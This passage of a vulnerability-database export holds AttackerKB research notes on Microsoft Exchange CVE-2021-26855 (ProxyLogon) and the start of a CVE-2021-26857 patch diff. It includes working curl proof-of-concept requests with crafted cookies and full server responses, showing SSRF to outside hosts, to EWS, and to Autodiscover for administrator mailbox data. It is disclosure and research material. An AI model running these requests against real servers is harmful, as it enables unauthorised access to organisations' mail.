15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010 are vulnerable to a SSRF via the X-AnonResource-Backend and X-BEResource cookies.\n |\n | Disclosure date: 2021-03-02\n | References:\n | https://vulners.com/cve/CVE-2021-26855\n |_ http://aka.ms/exchangevulns\n \n NSE: Script Post-scanning.\n Initiating NSE at 00:50\n Completed NSE at 00:50, 0.00s elapsed\n Read data files from: /usr/local/bin/../share/nmap\n Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds\n wvu@kharak:~/Downloads$\n \n\n### Ported to [curl(1)](<https://curl.se/>)\u2026\n \n \n wvu@kharak:~$ curl -kvb \"X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;\" https://192.168.123.183/owa/auth/x.js\n * Trying 192.168.123.183...\n * TCP_NODELAY set\n * Connected to 192.168.123.183 (192.168.123.183) port 443 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate verify locations:\n * CAfile: /etc/ssl/cert.pem\n CApath: none\n * TLSv1.2 (OUT), TLS handshake, Client hello (1):\n * TLSv1.2 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n * TLSv1.2 (IN), TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (IN), TLS handshake, Finished (20):\n * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256\n * ALPN, server accepted to use h2\n * Server certificate:\n * subject: CN=WIN-T4RO9496TA7\n * start date: Mar 8 22:45:17 2021 GMT\n * expire date: Mar 8 22:45:17 2026 GMT\n * issuer: CN=WIN-T4RO9496TA7\n * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n * Using HTTP2, server supports multi-use\n * Connection state changed (HTTP/2 confirmed)\n * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0\n * Using Stream ID: 1 (easy handle 0x7f8cb580b400)\n > GET /owa/auth/x.js HTTP/2\n > Host: 192.168.123.183\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;\n >\n * Connection state changed (MAX_CONCURRENT_STREAMS == 100)!\n < HTTP/2 500\n < cache-control: private\n < content-type: text/html; charset=utf-8\n < server: Microsoft-IIS/10.0\n < request-id: 864475e3-ee01-48a5-acf3-1b1cbbc50c02\n < x-calculatedbetarget: localhost\n < x-calculatedbetarget: localhost\n < x-feserver: WIN-T4RO9496TA7\n < x-aspnet-version: 4.0.30319\n < x-powered-by: ASP.NET\n < date: Tue, 09 Mar 2021 06:52:07 GMT\n < content-length: 85\n <\n * Connection #0 to host 192.168.123.183 left intact\n NegotiateSecurityContext failed with for host 'localhost' with status 'TargetUnknown'* Closing connection 0\n wvu@kharak:~$\n \n\n## SSRF to an arbitrary remote host\n\nYou can specify an arbitrary host in `X-AnonResource-Backend`.\n \n \n wvu@kharak:~$ curl -kvb \"X-AnonResource=true; X-AnonResource-Backend=192.168.123.1~$RANDOM\" \"https://192.168.123.183/owa/auth/$RANDOM.js\"\n * Trying 192.168.123.183...\n * TCP_NODELAY set\n * Connected to 192.168.123.183 (192.168.123.183) port 443 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate verify locations:\n * CAfile: /etc/ssl/cert.pem\n CApath: none\n * TLSv1.2 (OUT), TLS handshake, Client hello (1):\n * TLSv1.2 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n * TLSv1.2 (IN), TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (IN), TLS handshake, Finished (20):\n * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256\n * ALPN, server accepted to use h2\n * Server certificate:\n * subject: CN=WIN-T4RO9496TA7\n * start date: Mar 8 22:45:17 2021 GMT\n * expire date: Mar 8 22:45:17 2026 GMT\n * issuer: CN=WIN-T4RO9496TA7\n * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n * Using HTTP2, server supports multi-use\n * Connection state changed (HTTP/2 confirmed)\n * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0\n * Using Stream ID: 1 (easy handle 0x7f9ea080d600)\n > GET /owa/auth/22702.js HTTP/2\n > Host: 192.168.123.183\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Cookie: X-AnonResource=true; X-AnonResource-Backend=192.168.123.1~4563\n >\n * Connection state changed (MAX_CONCURRENT_STREAMS == 100)!\n \n\n### Catching the request in [ncat(1)](<https://nmap.org/ncat/>)\u2026\n \n \n wvu@kharak:~$ ncat -lkv --ssl 443\n Ncat: Version 7.91 ( https://nmap.org/ncat )\n Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.\n Ncat: SHA-1 fingerprint: F55B E690 D8F2 84F1 EC64 816A 5763 2F5B B56F 0D72\n Ncat: Listening on :::443\n Ncat: Listening on 0.0.0.0:443\n Ncat: Connection from 192.168.123.183.\n Ncat: Connection from 192.168.123.183:6303.\n GET /owa/auth/22702.js HTTP/1.1\n X-FE-ClientIP: 192.168.123.1\n X-Forwarded-For: 192.168.123.1\n X-Forwarded-Port: 55723\n X-MS-EdgeIP:\n X-ExCompId: ClientAccessFrontEnd\n Accept: */*\n User-Agent: curl/7.64.1\n X-OriginalRequestHost: 192.168.123.183\n X-OriginalRequestHostSchemePort: 443:https:192.168.123.183\n X-MSExchangeActivityCtx: V=1.0.0.0;Id=26678ebf-2d0f-42bd-bac3-2d27889baed8;C=;P=\n msExchProxyUri: https://192.168.123.183/owa/auth/22702.js\n X-IsFromCafe: 1\n X-SourceCafeServer: WIN-T4RO9496TA7.GIBSON.LOCAL\n X-CommonAccessToken: VgEAVAlBbm9ueW1vdXNDAEUAAAAA\n X-vDirObjectId: 621dccd3-6dff-49aa-87be-7911a110125e\n Host: 192.168.123.1\n Cookie: X-AnonResource=true; X-AnonResource-Backend=192.168.123.1~4563\n Connection: Keep-Alive\n \n\nThe fun folks working on the [Nuclei scanner](<https://github.com/projectdiscovery/nuclei>) noticed [burpcollaborator.net](<https://burpcollaborator.net/>) made a [good target](<https://github.com/projectdiscovery/nuclei-templates/pull/1032>) for their scanner.\n \n \n wvu@kharak:~$ curl -kvb \"X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net~$RANDOM\" \"https://192.168.123.183/owa/auth/$RANDOM.js\"\n * Trying 192.168.123.183...\n * TCP_NODELAY set\n * Connected to 192.168.123.183 (192.168.123.183) port 443 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate verify locations:\n * CAfile: /etc/ssl/cert.pem\n CApath: none\n * TLSv1.2 (OUT), TLS handshake, Client hello (1):\n * TLSv1.2 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n * TLSv1.2 (IN), TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (IN), TLS handshake, Finished (20):\n * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256\n * ALPN, server accepted to use h2\n * Server certificate:\n * subject: CN=WIN-T4RO9496TA7\n * start date: Mar 8 22:45:17 2021 GMT\n * expire date: Mar 8 22:45:17 2026 GMT\n * issuer: CN=WIN-T4RO9496TA7\n * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n * Using HTTP2, server supports multi-use\n * Connection state changed (HTTP/2 confirmed)\n * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0\n * Using Stream ID: 1 (easy handle 0x7fd58480f600)\n > GET /owa/auth/18409.js HTTP/2\n > Host: 192.168.123.183\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Cookie: X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net~31368\n >\n * Connection state changed (MAX_CONCURRENT_STREAMS == 100)!\n < HTTP/2 200\n < cache-control: private\n < content-type: text/html\n < server: Microsoft-IIS/10.0\n < request-id: 31688df5-982d-4d18-86d1-ae0e99c00ce8\n < x-calculatedbetarget: burpcollaborator.net\n < x-collaborator-version: 4\n < x-aspnet-version: 4.0.30319\n < x-powered-by: ASP.NET\n < date: Tue, 09 Mar 2021 07:58:52 GMT\n < content-length: 1190\n <\n <!DOCTYPE html>\n <html>\n <head>\n <meta charset=\"UTF-8\">\n </head>\n <body>\n <h1>Burp Collaborator Server</h1>\n <p>Burp Collaborator is a service that is used by <a href=\"https://portswigger.net/burp/\">Burp Suite</a> when testing web applications for security\n vulnerabilities. Some of Burp Suite's tests may cause the application being\n tested to interact with the Burp Collaborator server, to enable Burp Suite\n to detect various security vulnerabilities.\n </p><p>The Burp Collaborator server does not itself initiate any interactions with\n any system, and only responds to interactions that it receives from other\n systems.\n </p><p>If you are a systems administrator and you are seeing interactions with the\n Burp Collaborator server in your logs, then it is likely that someone is\n testing your web application using Burp Suite. If you are trying to identify\n the person responsible for this testing, you should review your web server\n or applications logs for the time at which these interactions were initiated\n by your systems.\n </p><p>For further details about Burp Collaborator, please see the <a href=\"https://portswigger.net/burp/documentation/collaborator/\">full documentation</a>.</p></body>\n * Connection #0 to host 192.168.123.183 left intact\n </html>* Closing connection 0\n wvu@kharak:~$\n \n\n## SSRF to a privileged backend resource\n\nHostname `WIN-T4RO9496TA7` is from the `x-feserver` header.\n \n \n wvu@kharak:~$ curl -kvb \"X-BEResource=WIN-T4RO9496TA7/EWS/Exchange.asmx?~$RANDOM\" \"https://192.168.123.183/ecp/$RANDOM.js\"\n * Trying 192.168.123.183...\n * TCP_NODELAY set\n * Connected to 192.168.123.183 (192.168.123.183) port 443 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate verify locations:\n * CAfile: /etc/ssl/cert.pem\n CApath: none\n * TLSv1.2 (OUT), TLS handshake, Client hello (1):\n * TLSv1.2 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n * TLSv1.2 (IN), TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (IN), TLS handshake, Finished (20):\n * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256\n * ALPN, server accepted to use h2\n * Server certificate:\n * subject: CN=WIN-T4RO9496TA7\n * start date: Mar 8 22:45:17 2021 GMT\n * expire date: Mar 8 22:45:17 2026 GMT\n * issuer: CN=WIN-T4RO9496TA7\n * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n * Using HTTP2, server supports multi-use\n * Connection state changed (HTTP/2 confirmed)\n * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0\n * Using Stream ID: 1 (easy handle 0x7faac2808200)\n > GET /ecp/1849.js HTTP/2\n > Host: 192.168.123.183\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Cookie: X-BEResource=WIN-T4RO9496TA7/EWS/Exchange.asmx?~22406\n >\n * Connection state changed (MAX_CONCURRENT_STREAMS == 100)!\n < HTTP/2 200\n < cache-control: private\n < content-type: text/html; charset=UTF-8\n < server: Microsoft-IIS/10.0\n < request-id: b4762a11-d418-43f8-a435-f04420289a4c\n < x-calculatedbetarget: win-t4ro9496ta7\n < x-calculatedbetarget: win-t4ro9496ta7.gibson.local\n < x-diaginfo: WIN-T4RO9496TA7\n < x-beserver: WIN-T4RO9496TA7\n < x-feserver: WIN-T4RO9496TA7\n < x-aspnet-version: 4.0.30319\n < set-cookie: exchangecookie=ef4d50599057429b849b92e9059455af; expires=Wed, 09-Mar-2022 07:00:11 GMT; path=/; HttpOnly\n < set-cookie: X-BackEndCookie=S-1-5-18=rJqNiZqNgai2sdKry62wxsvGyau+yNGYlp2MkJHRk5CcnpOBzsbLzc/JzM3MzYHNz83O0s/M0s/Gq8/Ixc7Pxc7O; expires=Tue, 09-Mar-2021 07:10:11 GMT; path=/EWS; secure; HttpOnly\n < x-powered-by: ASP.NET\n < x-feserver: WIN-T4RO9496TA7\n < date: Tue, 09 Mar 2021 07:00:11 GMT\n < content-length: 2836\n <\n <HTML lang=\"en\"><HEAD><link rel=\"alternate\" type=\"text/xml\" href=\"https://win-t4ro9496ta7.gibson.local:444/EWS/Exchange.asmx?disco\"/><STYLE type=\"text/css\">#content{ FONT-SIZE: 0.7em; PADDING-BOTTOM: 2em; MARGIN-LEFT: 30px}BODY{MARGIN-TOP: 0px; MARGIN-LEFT: 0px; COLOR: #000000; FONT-FAMILY: Verdana; BACKGROUND-COLOR: white}P{MARGIN-TOP: 0px; MARGIN-BOTTOM: 12px; COLOR: #000000; FONT-FAMILY: Verdana}PRE{BORDER-RIGHT: #f0f0e0 1px solid; PADDING-RIGHT: 5px; BORDER-TOP: #f0f0e0 1px solid; MARGIN-TOP: -5px; PADDING-LEFT: 5px; FONT-SIZE: 1.2em; PADDING-BOTTOM: 5px; BORDER-LEFT: #f0f0e0 1px solid; PADDING-TOP: 5px; BORDER-BOTTOM: #f0f0e0 1px solid; FONT-FAMILY: Courier New; BACKGROUND-COLOR: #e5e5cc}.heading1{MARGIN-TOP: 0px; PADDING-LEFT: 15px; FONT-WEIGHT: normal; FONT-SIZE: 26px; MARGIN-BOTTOM: 0px; PADDING-BOTTOM: 3px; MARGIN-LEFT: -30px; WIDTH: 100%; COLOR: #ffffff; PADDING-TOP: 10px; FONT-FAMILY: Tahoma; BACKGROUND-COLOR: #003366}.intro{display: block; font-size: 1em;}</STYLE><TITLE>Service</TITLE></HEAD><BODY><DIV id=\"content\" role=\"main\"><h1 class=\"heading1\">Service</h1><BR/><P class=\"intro\">You have created a service.<P class='intro'>To test this service, you will need to create a client and use it to call the service. You can do this using the svcutil.exe tool from the command line with the following syntax:</P> <BR/><PRE>svcutil.exe <A HREF=\"https://win-t4ro9496ta7.gibson.local:444/EWS/Services.wsdl\">https://win-t4ro9496ta7.gibson.local:444/EWS/Services.wsdl</A></PRE></P><P class=\"intro\">This will generate a configuration file and a code file that contains the client class. Add the two files to your client application and use the generated client class to call the Service. For example:<BR/></P><h2 class='intro'>C#</h2><br /><PRE><font color=\"blue\">class </font><font color=\"black\">Test\n </font>{\n <font color=\"blue\"> static void </font>Main()\n {\n <font color=\"black\">HelloClient</font> client = <font color=\"blue\">new </font><font color=\"black\">HelloClient</font>();\n \n <font color=\"darkgreen\"> // Use the 'client' variable to call operations on the service.\n \n </font><font color=\"darkgreen\"> // Always close the client.\n </font> client.Close();\n }\n }\n </PRE><BR/><h2 class='intro'>Visual Basic</h2><br /><PRE><font color=\"blue\">Class </font><font color=\"black\">Test\n </font><font color=\"blue\"> Shared Sub </font>Main()\n <font color=\"blue\"> Dim </font>client As <font color=\"black\">HelloClient</font> = <font color=\"blue\">New </font><font color=\"black\">HelloClient</font>()\n <font color=\"darkgreen\"> ' Use the 'client' variable to call operations on the service.\n \n </font><font color=\"darkgreen\"> ' Always close the client.\n </font> client.Close()\n <font color=\"blue\"> End Sub\n * Connection #0 to host 192.168.123.183 left intact\n </font><font color=\"blue\">End Class</font></PRE></DIV></BODY></HTML>* Closing connection 0\n wvu@kharak:~$\n \n\n`POST`ing to the [EWS](<https://docs.microsoft.com/en-us/exchange/client-developer/web-service-reference/ews-reference-for-exchange>) endpoint (not shown) allows an attacker access to a target\u2019s mailbox. A sample [Autodiscover request](<https://docs.microsoft.com/en-us/exchange/client-developer/web-service-reference/pox-autodiscover-request-for-exchange>) is shown below.\n \n \n wvu@kharak:~/Downloads$ cat poc.xml\n <?xml version=\"1.0\"?>\n <Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006\">\n <Request>\n <EMailAddress>Administrator@gibson.local</EMailAddress>\n <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>\n </Request>\n </Autodiscover>\n wvu@kharak:~/Downloads$ curl -kvb \"X-BEResource=WIN-T4RO9496TA7/autodiscover/autodiscover.xml?~$RANDOM\" -H \"Content-Type: text/xml\" \"https://192.168.123.207/ecp/$RANDOM.js\" -d @poc.xml\n * Trying 192.168.123.207...\n * TCP_NODELAY set\n * Connected to 192.168.123.207 (192.168.123.207) port 443 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate verify locations:\n * CAfile: /etc/ssl/cert.pem\n CApath: none\n * TLSv1.2 (OUT), TLS handshake, Client hello (1):\n * TLSv1.2 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n * TLSv1.2 (IN), TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (IN), TLS handshake, Finished (20):\n * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256\n * ALPN, server accepted to use h2\n * Server certificate:\n * subject: CN=WIN-T4RO9496TA7\n * start date: Mar 8 22:45:17 2021 GMT\n * expire date: Mar 8 22:45:17 2026 GMT\n * issuer: CN=WIN-T4RO9496TA7\n * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n * Using HTTP2, server supports multi-use\n * Connection state changed (HTTP/2 confirmed)\n * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0\n * Using Stream ID: 1 (easy handle 0x7fa592808200)\n > POST /ecp/3425.js HTTP/2\n > Host: 192.168.123.207\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Cookie: X-BEResource=WIN-T4RO9496TA7/autodiscover/autodiscover.xml?~24753\n > Content-Type: text/xml\n > Content-Length: 354\n >\n * Connection state changed (MAX_CONCURRENT_STREAMS == 100)!\n * We are completely uploaded and fine\n < HTTP/2 200\n < cache-control: private\n < content-type: text/xml; charset=utf-8\n < server: Microsoft-IIS/10.0\n < request-id: bde5e90a-fe14-4b47-aaca-1a713d9832b1\n < x-calculatedbetarget: win-t4ro9496ta7\n < x-calculatedbetarget: win-t4ro9496ta7.gibson.local\n < x-diaginfo: WIN-T4RO9496TA7\n < x-beserver: WIN-T4RO9496TA7\n < x-feserver: WIN-T4RO9496TA7\n < x-aspnet-version: 4.0.30319\n < set-cookie: X-BackEndCookie=S-1-5-18=rJqNiZqNgai2sdKry62wxsvGyau+yNGYlp2MkJHRk5CcnpOBzsbLzc/JzM3MzYHNz83O0s/M0s7Pq8/OxczJxc7G; expires=Wed, 10-Mar-2021 01:36:19 GMT; path=/autodiscover; secure; HttpOnly\n < x-powered-by: ASP.NET\n < x-feserver: WIN-T4RO9496TA7\n < date: Wed, 10 Mar 2021 01:26:19 GMT\n < content-length: 3866\n <\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\n <Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/responseschema/2006\">\n <Response xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a\">\n <User>\n <DisplayName>Administrator</DisplayName>\n <LegacyDN>/o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=94812d66d68146e8b6ac7b3312a93d7b-Admin</LegacyDN>\n <AutoDiscoverSMTPAddress>Administrator@gibson.local</AutoDiscoverSMTPAddress>\n <DeploymentId>eb64d327-1a67-4c9c-b64d-38d567e95480</DeploymentId>\n </User>\n <Account>\n <AccountType>email</AccountType>\n <Action>settings</Action>\n <MicrosoftOnline>False</MicrosoftOnline>\n <Protocol>\n <Type>EXCH</Type>\n <Server>47f3c51d-2094-4651-b009-c4c4a86a75e4@gibson.local</Server>\n <ServerDN>/o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Configuration/cn=Servers/cn=47f3c51d-2094-4651-b009-c4c4a86a75e4@gibson.local</ServerDN>\n <ServerVersion>73C18880</ServerVersion>\n <MdbDN>/o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Configuration/cn=Servers/cn=47f3c51d-2094-4651-b009-c4c4a86a75e4@gibson.local/cn=Microsoft Private MDB</MdbDN>\n <PublicFolderServer>win-t4ro9496ta7.gibson.local</PublicFolderServer>\n <AD>WIN-T4RO9496TA7.gibson.local</AD>\n <ASUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</ASUrl>\n <EwsUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</EwsUrl>\n <EmwsUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</EmwsUrl>\n <EcpUrl>https://win-t4ro9496ta7.gibson.local/owa/</EcpUrl>\n <EcpUrl-um>?path=/options/callanswering</EcpUrl-um>\n <EcpUrl-aggr>?path=/options/connectedaccounts</EcpUrl-aggr>\n <EcpUrl-mt>options/ecp/PersonalSettings/DeliveryReport.aspx?rfr=olk&exsvurl=1&IsOWA=<IsOWA>&MsgID=<MsgID>&Mbx=<Mbx>&realm=gibson.local</EcpUrl-mt>\n <EcpUrl-ret>?path=/options/retentionpolicies</EcpUrl-ret>\n <EcpUrl-sms>?path=/options/textmessaging</EcpUrl-sms>\n <EcpUrl-photo>?path=/options/myaccount/action/photo</EcpUrl-photo>\n <EcpUrl-tm>options/ecp/?rfr=olk&ftr=TeamMailbox&exsvurl=1&realm=gibson.local</EcpUrl-tm>\n <EcpUrl-tmCreating>options/ecp/?rfr=olk&ftr=TeamMailboxCreating&SPUrl=<SPUrl>&Title=<Title>&SPTMAppUrl=<SPTMAppUrl>&exsvurl=1&realm=gibson.local</EcpUrl-tmCreating>\n <EcpUrl-tmEditing>options/ecp/?rfr=olk&ftr=TeamMailboxEditing&Id=<Id>&exsvurl=1&realm=gibson.local</EcpUrl-tmEditing>\n <EcpUrl-extinstall>?path=/options/manageapps</EcpUrl-extinstall>\n <OOFUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</OOFUrl>\n <UMUrl>https://win-t4ro9496ta7.gibson.local/EWS/UM2007Legacy.asmx</UMUrl>\n <ServerExclusiveConnect>off</ServerExclusiveConnect>\n </Protocol>\n <Protocol>\n <Type>EXPR</Type>\n <Server>win-t4ro9496ta7.gibson.local</Server>\n <SSL>Off</SSL>\n <AuthPackage>Ntlm</AuthPackage>\n <ServerExclusiveConnect>on</ServerExclusiveConnect>\n <CertPrincipalName>None</CertPrincipalName>\n <GroupingInformation>Default-First-Site-Name</GroupingInformation>\n </Protocol>\n <Protocol>\n <Type>WEB</Type>\n <Internal>\n <OWAUrl AuthenticationMethod=\"Basic, Fba\">https://win-t4ro9496ta7.gibson.local/owa/</OWAUrl>\n <Protocol>\n <Type>EXCH</Type>\n <ASUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</ASUrl>\n </Protocol>\n </Internal>\n </Protocol>\n </Account>\n </Response>\n * Connection #0 to host 192.168.123.207 left intact\n </Autodiscover>* Closing connection 0\n wvu@kharak:~/Downloads$\n \n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-03T00:00:00", "type": "attackerkb", "title": "CVE-2021-26855", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078"], "modified": "2021-03-03T00:00:00", "id": "AKB:5D17BB38-86BB-4514-BF1D-39EB48FBE4F1", "href": "https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-18T16:43:29", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.\n\n \n**Recent assessments:** \n \n**wvu-r7** at March 03, 2021 6:59pm UTC reported:\n\nAs per [Microsoft\u2019s blog post](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) on Exchange Server 0day use by the HAFNIUM actors, [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>) is a deserialization vulnerability in Exchange Server\u2019s Unified Messaging (voicemail) service. Exploiting the vulnerability reportedly requires admin access or chaining with another vuln (likely [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>)), but successful exploitation results in RCE as the `SYSTEM` account. This vulnerability would ideally be combined with an [auth bypass](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>), which CVE-2021-26855 may very well provide.\n\nI took a look at CVE-2021-26857 last night and came up with the following patch diff:\n \n \n --- exchange.unpatched/Microsoft.Exchange.UM.UMCore/UMCore/PipelineContext.cs\t2021-03-02 19:54:18.000000000 -0600\n +++ exchange.patched/Microsoft.Exchange.UM.UMCore/UMCore/PipelineContext.cs\t2021-03-02 19:55:19.000000000 -0600\n @@ -1,742 +1,886 @@\n \ufeffusing System;\n +using System.Collections.Generic;\n using System.Globalization;\n using System.IO;\n +using System.Runtime.Serialization;\n +using Microsoft.Exchange.Compliance.Serialization.Formatters;\n +using Microsoft.Exchange.Data;\n +using Microsoft.Exchange.Data.Common;\n using Microsoft.Exchange.Data.Directory;\n using Microsoft.Exchange.Data.Directory.Recipient;\n using Microsoft.Exchange.Data.Directory.SystemConfiguration;\n using Microsoft.Exchange.Data.Storage;\n using Microsoft.Exchange.Diagnostics;\n using Microsoft.Exchange.Diagnostics.Components.UnifiedMessaging;\n using Microsoft.Exchange.ExchangeSystem;\n using Microsoft.Exchange.TextProcessing.Boomerang;\n using Microsoft.Exchange.UM.UMCommon;\n +using Microsoft.Mapi;\n \n namespace Microsoft.Exchange.UM.UMCore\n {\n \tinternal abstract class PipelineContext : DisposableBase, IUMCreateMessage\n \t{\n \t\tinternal PipelineContext()\n \t\t{\n \t\t}\n \n \t\tinternal PipelineContext(SubmissionHelper helper)\n \t\t{\n \t\t\tbool flag = false;\n \t\t\ttry\n \t\t\t{\n \t\t\t\tthis.helper = helper;\n \t\t\t\tthis.cultureInfo = new CultureInfo(helper.CultureInfo);\n \t\t\t\tflag = true;\n \t\t\t}\n \t\t\tfinally\n \t\t\t{\n \t\t\t\tif (!flag)\n \t\t\t\t{\n \t\t\t\t\tthis.Dispose();\n \t\t\t\t}\n \t\t\t}\n \t\t}\n \n \t\tpublic MessageItem MessageToSubmit\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\treturn this.messageToSubmit;\n \t\t\t}\n \t\t\tprotected set\n \t\t\t{\n \t\t\t\tthis.messageToSubmit = value;\n \t\t\t}\n \t\t}\n \n \t\tpublic string MessageID\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\treturn this.messageID;\n \t\t\t}\n \t\t\tprotected set\n \t\t\t{\n \t\t\t\tthis.messageID = value;\n \t\t\t}\n \t\t}\n \n \t\tinternal abstract Pipeline Pipeline { get; }\n \n \t\tinternal Microsoft.Exchange.UM.UMCommon.PhoneNumber CallerId\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\treturn this.helper.CallerId;\n \t\t\t}\n \t\t}\n \n \t\tinternal Guid TenantGuid\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\treturn 